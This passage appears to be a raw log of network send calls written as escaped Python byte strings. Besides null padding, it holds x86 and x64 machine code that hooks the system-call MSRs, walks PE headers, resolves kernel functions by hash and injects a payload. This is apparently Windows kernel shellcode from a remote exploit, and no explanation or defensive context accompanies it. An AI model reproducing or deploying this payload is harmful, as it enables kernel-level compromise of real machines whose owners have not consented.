x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\
\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea 
\\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\
x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR
\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\
x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\
\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\
\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 8, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\
\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\